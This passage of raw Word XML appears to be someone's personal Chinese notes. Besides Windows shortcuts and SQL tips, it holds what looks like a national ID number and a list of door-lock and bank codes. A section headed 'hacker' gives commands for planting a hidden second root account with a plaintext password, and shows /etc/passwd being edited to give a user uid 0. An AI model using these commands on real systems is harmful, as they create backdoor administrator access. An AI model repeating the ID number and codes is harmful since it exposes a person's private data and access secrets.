          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>声学所楼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>食堂</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>篮球场</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>空间所楼</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>110108197205251414</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>门禁密码锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>侧门</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>制服女</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 08</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卫星云图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 19</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 72</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 05</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>电梯</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>开水</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>厕所</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00073425" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>快捷键</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当你的程序是最大化的窗口的时候，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>alt+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>空格，再按</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你的窗口就</w:t>
      </w:r>
      <w:r w:rsidRPr="0064526D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>最小化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="000C1E1E" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当你的程序是小窗口的时候，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>alt+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>空格，再按</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你的窗口就</w:t>
      </w:r>
      <w:r w:rsidRPr="0064526D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>最大化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ike:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询中间包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">elect * from table where field like </w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%n%</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去重复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:distinct</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="宋体" w:hAnsi="新宋体" w:cs="新宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00832462">
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="宋体" w:hAnsi="新宋体" w:cs="新宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>select distinct TaskName from RiskMgr where Department=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00171739" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00F74325" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>黑客</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备忘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的权限比较低</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带权限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00BF2EF1" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:widowControl/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF2EF1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>useradd -o -u 0 -g 0 -M -d /root -s /bin/bash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2EF1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>passwd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2EF1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>aa123..0</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2EF1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>aa123..0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="559"/>
      </w:pPr>
      <w:r>
        <w:t>useradd -o -u 0 -g 0 -M -d /root -s /bin/bash bosstt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="559"/>
      </w:pPr>
      <w:r>
        <w:t>passwd bosstt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="559"/>
      </w:pPr>
      <w:r>
        <w:t>aa123..0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>aa123..0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者加了用户之后再改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>useradd bosstt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>编辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文件，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>把新加的用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>gid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>即可：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>原来：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>testuser:x:5:5::/home/testuser:/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>修改后：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>testuser:x</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63273">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:0:0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>::/home/testuser:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00D63273" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="559"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63273">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63273">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63273">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>可以用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63273">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>id user1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63273">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>命令测试用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63273">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>user1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63273">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>的属性</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63273">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63273">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>显示为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63273">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00D63273" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63273">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>uid=0(root),gid=0(root),group=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00C15028" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xftp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连不上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的原因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>未关防火墙</w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E24B28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>端口被占用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
